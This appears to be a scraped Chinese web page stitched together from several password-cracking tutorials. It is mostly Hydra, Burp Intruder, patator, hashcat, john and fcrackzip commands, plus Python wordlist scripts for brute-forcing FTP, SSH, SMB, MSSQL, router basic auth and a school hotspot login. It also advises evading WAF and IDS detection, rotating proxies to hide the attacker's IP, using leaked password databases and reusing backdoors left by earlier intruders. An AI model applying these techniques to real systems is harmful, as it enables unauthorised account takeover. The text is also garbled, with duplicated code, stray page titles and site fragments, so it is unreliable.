hydra ip网易云音乐能不能上传txt

hydra的简介hydra破解工具支持多种协议的登录密码,可以添加新组件,使用方便灵活。hydra可在Linux、Windows和OS X中使用。hydra可以用来破解很多种服务,包括IMAP,HTTP,SMB,VNC,MS-SQL,MySQL,SMTP等等。hydra的主要选项(摘自《Kail Linux&BackTrack渗透测试实战》)-R
修复之前使用的aborted/crashed session-S 执行SSL(Secure Socket Layer)连接-s
Port 使用非默认服务器端口而是其他端口时,指定其端口-l Login 已经获取登录ID的情况下输入登录ID-L FILE 未获取登录ID情况下指定用于暴力破解的文件(需要指出全路径)-p
Pass 已经获取登录密码的情况下输入登录密码-P
FILE 未获取登录密码的情况下指定用于暴力破解的文件(需要指出全路径)-x
MIN:MAX:CHARSET 暴力破解时不指定文件,而生可以满足指定字符集和最短、最长长度条件的密码来尝试暴力破解-C FILE 用于指定由冒号区分形式的暴力破解专用文件,即ID:Password形式-M FILE指定实施并列攻击的文件服务器的目录文件-o
FILE以STDOUT的形式输出结果值-f
查找到第一个可以使用的ID和密码的时候停止破解-t TASKS 指定并列连接数(默认值:16)-w 指定每个线程的回应时间(Waittime)(默认值:32秒)-4/6
指定IPv4/IPv6(默认值:IPv4)-v/-V显示详细信息-U 查看服务器组件使用明细对于FTP服务器解示例掌握FTP服务器的ID后,利用hydra暴力破解服务器的ID是root ,破解的字典密码是password.txt
,服务器的ip为192.168.126.136(其他均为默认值) 协议是ftp对于web登录界面的破解对于基于表单提交的web登录界面,在破解之前你必须知道你要破解web表达的相关信息。对于每个web都会有不同的URL ,参数和失败以及成功的返回信息你需要知道的信息有:1.你要破解的主机名或者IP和URL2.区分是https和http3.表单支持的提交方法(POST or GET)4.请求的参数名5.登录成功和失败时返回信息的区别如果对于以上任何一项信息理解错误都将引起破解失败根据以上提示获取必要信息(针对学校上网城市热点登录破解):使用wireshark抓取使用错误的用户名和密码登录时的数据包从上图可得主机ip为192.168.100.83;
url为http://192.168.100.83/0.
表单的提交方式为表单选项表单参数为:DDDDD=用户名 upass=密码 OMKKey=空错误提示含有Ivalid account or password……中文返回信息不能够作为判别条件或者查看网页源码寻找具有代表性的登录错误提示Msg也可以作为登录错误页面的返回判断条件,因为登录成功的页面是不含有Msg字符串的获取以上信息我们就可以使用hydra暴力破解了:已经构造好的用户字典:第一个账号是正确的账号密码字典:第一个密码是正确的查询破解http-post-form破解的命令输入格式:root@qianqiangV:~# hydra -U http-post-formHydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.Hydra (http://www.thc.org/thc-hydra) starting at
05:27:30Help for module http-post-form:============================================================================Module http-post-form requires the page and the parameters for the web form.By default this module is configured to follow a maximum of 5 redirections ina row. It always gathers a new cookie from the same URL without variablesThe parameters take three ":" separated values, plus optional values.(Note: if you need a colon in the option string as value, escape it with "\:", but do not escape a "\" with "\\".)Syntax:
&url&:&form parameters&:&condition string&[:&optional&[:&optional&]First is the page on the server to GET or POST to (URL).Second is the POST/GET variables (taken from either the browser, proxy, etc. with usernames and passwords being replaced in the "^USER^" and "^PASS^" placeholders (FORM PARAMETERS)Third is the string that it checks for an *invalid* login (by default) Invalid condition login check can be preceded by "F=", successful condition login check must be preceded by "S=". This is where most people get it wrong. You have to check the webapp what a failed string looks like and put it in this parameter!The following parameters are optional: C=/page/uri
to define a different page to gather initial cookies from (h|H)=My-Hdr\: foo
to send a user defined HTTP header with each request
^USER^ and ^PASS^ can also be put into these headers!
Note: 'h' will add the user-defined header at the end
regardless it's already being sent by Hydra or not.
'H' will replace the value of that header if it exists, by the
one supplied by the user, or add the header at the endNote that if you are going to put colons (:) in your headers you should escape them with a backslash (\). All colons that are not option separators should be escaped (see the examples above and below). You can specify a header without escaping the colons, but that way you will not be able to put colons in the header value itself, as they will be interpreted by hydra as option separators.Examples: "/login.php:user=^USER^&pass=^PASS^:incorrect" "/login.php:user=^USER^&pass=^PASS^&colon=colon\:escape:S=authlog=.*success" "/login.php:user=^USER^&pass=^PASS^&mid=123:authlog=.*failed" "/:user=^USER&pass=^PASS^:failed:H=Authorization\: Basic dT1w:H=Cookie\: sessid=aaaa:h=X-User\: ^USER^" "/exchweb/bin/auth/owaauth.dll:destination=http%3A%2F%2F&target&%2Fexchange&flags=0&username=&domain&%5C^USER^&password=^PASS^&SubmitCreds=x&trusted=0:reason=:C=/exchweb"http-post-form是指待破解的服务(如果是用get提交可以换成http-get-form)"/0.htm:DDDDD=^USER^&upass=^PASS^&0MKKey=:Msg"格式为: &url&:&表单参数&:&返回值&[:&optional&[:&optional&]表单参数用户名需要用^USER^替代和密码需要用^PASS^替代:返回值,可以定义登录正确的返回值S=,也可以定义登录错误的返回值F=,,默认是F=破解成功!hydra是一款优秀的破解工具,但是登录页面需要验证码,则没有办法破译。我将会在下一篇文章,使用java写一个类似的破解这个登录页面的暴力破解程序
如果您想留下此文,您可以将其发送至您的邮箱(将同时以邮件内容&PDF形式发送)
相关文章推荐
(Ctrl+Enter提交) &&
已有0人在此发表见解
&在& 09:37收藏到了
&&在信息爆炸的时代,您的知识需要整理,沉淀,积累!Lai18为您提供一个简单实用的文章整理收藏工具,在这里您可以收藏对您有用的技术文章,自由分门别类,在整理的过程中,用心梳理自己的知识!相信,用不了多久,您收藏整理的文章将是您一生的知识宝库!
· 蜀ICP备号-1使用hydra破解路由器密码-路由技术
当前位置:&>&&>& &
使用hydra破解路由器密码
使用hydra破解路由器密码
| 来源:网络 | 关键字:
hydra是个网络协议暴力破解工具,。。支持很多协议下面说下怎么使用其破解路由器密码[root@fedora~]#hydraHydrav7
hydra 是个网络协议暴力破解工具 ,。。支持很多协议 下面说下怎么使用其破解路由器密码
[root@fedora ~]# hydra
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [server service [OPT]]|[service://server[:PORT][/OPT]]
& -R&&&&&&& restore a previous aborted/crashed session
& -S&&&&&&& perform an SSL connect
& -s PORT&& if the service is on a different default port, define it here
& -l LOGIN or -L FILE& login with LOGIN name, or load several logins from FILE
& -p PASS& or -P FILE& try password PASS, or load several passwords from FILE
& -x MIN:MAX:CHARSET& password bruteforce generation, type "-x -h" to get help
& -e nsr&&& try "n" null password, "s" login as pass and/or "r" reversed login
& -u&&&&&&& loop around users, not passwords (effective! implied with -x)
& -C FILE&& colon separated "login:pass" format, instead of -L/-P options
& -M FILE&& list of servers to be attacked in parallel, one entry per line
& -o FILE&& write found login/password pairs to FILE instead of stdout
& -f / -F&& exit when a login/pass pair is found (-M: -f per host, -F global)
& -t TASKS& run TASKS number of connects in parallel (per host, default: 16)
& -w / -W TIME& waittime for responses (32s) / between connects per thread
& -4 / -6&& prefer IPv4 (default) or IPv6 addresses
& -v / -V&& verbose mode / show login+pass combination for each attempt
& -U&&&&&&& service module usage details
& server&&& the target server (use either this OR the -M option)
& service&& the service to crack. Supported protocols: cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh sip smb smtp[s] smtp-enum snmp socks5 ssh svn teamspeak telnet[s] vmauthd vnc xmpp
& OPT&&&&&& some service modules need special input (use -U to see module help)
Use HYDRA_PROXY_HTTP/HYDRA_PROXY and HYDRA_PROXY_AUTH environment for a proxy.
Hydra is a tool to guess/crack valid login/password pairs - usage only allowed
for legal purposes.& Newest version available at http://www.thc.org/thc-hydra
The following services were not compiled in: sapr3 afp oracle.
& hydra -l john -p doe 192.168.0.1 ftp
& hydra -L user.txt -p defaultpw -S 192.168.0.1 imap PLAIN
& hydra -l admin -P pass.txt http-proxy://192.168.0.1
& hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/DIGEST-MD5
& 针对那些在 http 头里发送认证消息的
& 也就是浏览器弹出个窗叫你登录的那种,。。
hydra& -l admin -P /root/pass.txt -f -V -e nsr -s 8888 -t 1& 192.168.7.254 http-get
&-l 指定一个用户名
-L 使用用户名字典
-P 使用密码字典
-f 登录成功了 退出破解
&-e nsr 也就是尝试 密码为空 密码和用户名相同& 密码是用户名反写的& 要破解的用户名比较多的时候 比较适用
-t 一个 host 并发连接数
-s 指定端口 如果不是默认的话
http-get& 使用 http GET 方法
-V 显示详细信息 。、
破解的时候如果遇到了太多的错误 就会停止破解。。
中途可以Ctrl+C& 终止& 下次继续破解 、、
无相关信息
网友评论仅供其表达个人看法,并不表明网易立场。hydra教程详解_百度文库
两大类热门资源免费畅读
续费一年阅读会员,立省24元!
hydra教程详解
上传于|0|0|文档简介
&&linux下密码暴力破解工具
阅读已结束,如果下载本文需要使用1下载券
想免费下载本文?
定制HR最喜欢的简历
下载文档到电脑,查找使用更方便
还剩1页未读,继续阅读
定制HR最喜欢的简历
你可能喜欢打开微信“扫一扫”,打开网页后点击屏幕右上角分享按钮
一次测试的过程总会涉及到”密码”与”加解密”.在踩点的过程中,对弱口令的尝试是必不可少的过程,从xx抓鸡到内网哈希批量传递,从个人PC到?网络设备/工控设施,只要依旧采用单因素模式的密码认证,密码扫描就不会被遗忘.以下笔者简单分享总结安全测试中密码扫描与破解的技巧,如有疏漏错误,还望不吝赐教.
0x01 整理一份优秀的字典
想破解密码,要求我们已经”拥有”别人的密码.字典在口令扫描尝试过程中的重要性不言而喻.要整理一份优秀的字典,不妨参考各大网站泄漏数据库,将密码(明文)字段收集后,依出现频率先后生成字典.
一个demo脚本:
#!/bin/bash/python
import sys
from collections import Counter
file = open(sys.argv[1], 'r')
readlist = []
count_times = []
for line in file.readlines():
line = line.strip('\r\n ')
readlist.append(line)
sortlist = Counter(readlist).most_common()
for line in sortlist:
print line[0]
123456789101112
#!/bin/bash/pythonimport sysfrom collections import Counterfile = open(sys.argv[1], 'r')readlist = []count_times = []for line in file.readlines():line = line.strip('\r\n ')readlist.append(line)sortlist = Counter(readlist).most_common()for line in sortlist:print line[0]
0x02 一手称心如意的工具集
欲善其事,须利其器.在密码枚举工具中,笔者比较推荐的工具List如下:
Hydra :在线各种服务账户密码猜解
Medusa : 类似Hydra
Patator : Python多协议破解工具
John the ripper : 离线破解哈希
Hashcat : GPU离线哈希破解
Burp Suite : 在线密码枚举
Rcracki : 离线彩虹表哈希破解
Ophcrack : 离线LMHash/NTHash破解
Hashid/HashTag : 哈希算法分析
Fcrackzip/Truecrack等特定文件密码破解工具
Metasploit : 各种辅助测试脚本
Cupp.py : 社工字典生成
当然,根据特定需要(如加入各种伪装绕过检测),可能也需要我们自行编写相应脚本实现枚举账户的过程.
0x03 绕过检测
Web层有WAF,Service有IDS/IPS,很容易打草惊蛇.在测试前,先通过扫描等方式判断是否有相应的防护,并采取相应手段.Web层可能有验证码,可能有每秒IP连接数限制,可能通过Cookie/Header等信息判断行为是Human or Robot.在通过一系列测试后,(如何测试还是要自己探索的),采用最合理的针对方式绕过或尽量避免被检测而导致的阻挡枚举账户密码的脚步.
0x04 Web账户枚举
Web账户枚举是平日遇到较多的情况
EXP无果,某处又没有做严谨的验证码等防护,为枚举账户密码制造了可能性.
发现前人留下的backdoor,苦于没有密码.
常见的绕过验证的可能:
页面无需刷新验证码无限次使用
密码输入错误数次弹出验证码,但更换账号不会出现验证码
修改Cookie或UA伪装逃避验证码
可批量轮询使用代理枚举绕过
在Web枚举中,使用BurpSuite基本可以解决所有常见问题.工具相关文档资料也比较丰富.
开启代理,打开Intercept,登陆网页,输入用户密码,数据包拦截下来,选择Send to Intruder,进入攻击模块.
其中四种模式:
Sniper: 只有一个payload,会将payload分别放在每个Fuzz点测试,默认选项,这也是新手发现Payload只能选择1的原因.
Battering Ram: 只有一个payload,会将payload同时放在多个Fuzz点测试.
Pitchfork: 多个payload,会将多个payload同一行同时放到相应Fuzz点测试.(适用扫号)
Cluster Bomb: 多个payload,payload在其Fuzz点循环测试,直到尝试所有可能.(适用多账户枚举密码)
选择好相应模式后,设置payload为runtime file,挂载字典文件.取消Payload Encoding.
如果发现网页有将用户的本地将密码计算MD5后提交,则需要在Payload Processing中添加计算MD5的过程
设置设置好后也可添加正则匹配结果等等.之后可以Start attack了.
这个过程中,如果担心IP地址暴露,可以选择写一个这样一个脚本:
脚本本地监听某端口,并为每次枚举随机抽取代理IP,Burp中设置Proxy为本地脚本所监听端口即可.
0x05 HTTP基础认证
家用路由/Jboss等往往采用HTTP基础认证,认证过程中,用户名密码加密.若无正确的用户名密码则会返回
HTTP/1.1 401 Authorization Required
HTTP/1.1 401 Authorization Required
抓包可以看到,以默认用户名admin,默认密码admin登陆路由,HTTP Header多的部分像是这样
Authorization: Basic YWRtaW46YWRtaW4=
Authorization: Basic YWRtaW46YWRtaW4=
Base64解密即为admin:admin.针对基础认证密码破解,依旧可以使用,但需要对用户名密码先做处理,一个demo脚本如下:
#!/usr/bin/python
import os.path,sys,base64
userfile = raw_input("input usr file:")
passfile = raw_input("input pwd file:")
outputfile = raw_input("input out file:")
outputfile = open(outputfile, "w")
userInfile = open(userfile)
passInfile = open(passfile)
userLines = userInfile.readlines()
passLines = passInfile.readlines()
for userLine in userLines:
for passLine in passLines:
combinedLine = userLine.strip() + ':' + passLine.strip()
print combinedLine
outputfile.write(base64.b64encode(combinedLine) + '\n')
userInfile.close()
passInfile.close()
outputfile.close()
123456789101112131415161718
#!/usr/bin/pythonimport os.path,sys,base64userfile = raw_input("input usr file:")passfile = raw_input("input pwd file:")outputfile = raw_input("input out file:")outputfile = open(outputfile, "w")userInfile = open(userfile)passInfile = open(passfile)userLines = userInfile.readlines()passLines = passInfile.readlines()for userLine in userLines:for passLine in passLines:combinedLine = userLine.strip() + ':' + passLine.strip()print combinedLineoutputfile.write(base64.b64encode(combinedLine) + '\n')userInfile.close()passInfile.close()outputfile.close()
生成字典后以Burp爆破即可
当然,Hydra给了更简易的解决方式
hydra -L user.txt -P pass.txt -F http://demourl:2048/auth
hydra -L user.txt -P pass.txt -F http://demourl:2048/auth
其中-L和-P大写均为挂载字典,-F表示全局一旦发现合法用户密码即停止破解,亦可加入-t参数指定线程数.
其中-L和-P大写均为挂载字典,-F表示全局一旦发现合法用户密码即停止破解,亦可加入-t参数指定线程数.
0x06 服务密码破解
密码枚举离不开服务,对常见服务如FTP/SSH/TELNET/POP3/1433等的破解枚举,资料已经很齐备,以下仅简要记录命令
hydra -L user.txt -P pass.txt -F ftp://127.0.0.1:21
hydra -L user.txt -P pass.txt -F ftp://127.0.0.1:21
hydra -L user.txt -P pass.txt -F ssh://127.0.0.1:22
hydra -L user.txt -P pass.txt -F ssh://127.0.0.1:22
patator ssh_login host=127.0.0.1 user=root password=FILE0 0=pass.txt -x ignore:mesg='Authentication failed.'
patator ssh_login host=127.0.0.1 user=root password=FILE0 0=pass.txt -x ignore:mesg='Authentication failed.'
hydra -L user.txt -P pass.txt -F smb://127.0.0.1
hydra -L user.txt -P pass.txt -F smb://127.0.0.1
hydra -L user.txt -P pass.txt -F mssql://127.0.0.1:1433
hydra -L user.txt -P pass.txt -F mssql://127.0.0.1:1433
0x07 社工字典生成
密码碰撞出来的情况,大多为两种可能:以admin为代表的弱口令和以*19??0101为代表的社工密码.在弱口令尝试失败的情况下,如果对目标信息有较充分的
掌握,则可尝试社工字典生成. 以cupp.py工具为例,创建新字典使用:
python cupp.py -i
python cupp.py -i
在填写相关信息后生成字典,然后使用上述工具继续枚举吧 ;-)
0x08 哈希破解
win环境下wce等工具直接抓取内存密码,抓取hash后离线破解往往也是难以避免的,尤其是在微软最近几个漏洞补丁之后:( 普通哈希可以使用Ophcrack破解,官网给出了对应的彩虹表下载,当然,也可以直接查询.
如情非得已,需要破解其他不常见密码哈希(借助已有web破解服务无法解决),暂时便只有三个相对高效的方法:
分布式 (如今已经有越来越多的工具开始尝试分布式破解,也可说是,云计算?)
GPU (或DSP/FPGA搞的专业密码破解硬件)
彩虹表 (没硬盘的就别想了)
而如果我们在密码的一定规则后,亦可按照规则破解密码. 如创建一个密码为hahaharoot的账户,用John暴力模式密码,普通计算机一天时间是很难跑出来的,但假设发现管理员其他密码如web/sql等均为hahaha开头,则可考虑定义密码规则,如
hashcat -m1800 -a3 hashdumpedfile --pw-min=7 --pw-max=11 "hahaha?l?l?l?l"
hashcat -m1800 -a3 hashdumpedfile --pw-min=7 --pw-max=11 "hahaha?l?l?l?l"
几秒钟的时间,得到了密码明文
其中-m指定哈希算法,-a3指定暴力破解方式.亦可通过脚本生成指定前缀的密码字典使用工具挂载字典加以破解
john -w:gen_wordlist.txt hash
john -w:gen_wordlist.txt hash
0x09 文件密码
最后补充一点对文件密码的破解,对于zip文件,由于加密方式没有rar强势,故被解密的可能性很大,一个kali下的破解工具命令如下:
fcrackzip -b -v -c a -l 1-4 -u 1.zip
fcrackzip -b -v -c a -l 1-4 -u 1.zip
其中,-b指定暴力破解,-v显示详细信息,-c a指定密码为纯字母,-l 1-4指定密码长度位1-4位,-u指使用可能的密码进行解压缩测试(加上,否则会出现很多干扰密码)
关于其他文件密码的破解,各位看官如有高效的工具,还望拿出来分享之. ;)
赏金发放情况:本文获得赏金110RMB,已于5.28日发放到作者账号。
征稿启事:91RI一直相信“你不与人分享,谁与你分享”, 分享的确是件非常有意义的事情。为了让优秀的同学有 地方分享自己的独到见解,也为了让更多同学从分享中受益,同时我们也希望给那些愿意分享的小伙伴们一点点心意作为感谢,所以我们隆重了推出“有奖征文”活 动!本次活动的详情可以围观《》
/ web-security
/ shellcode

我要回帖

更多关于 hydra ip段 的文章

 

随机推荐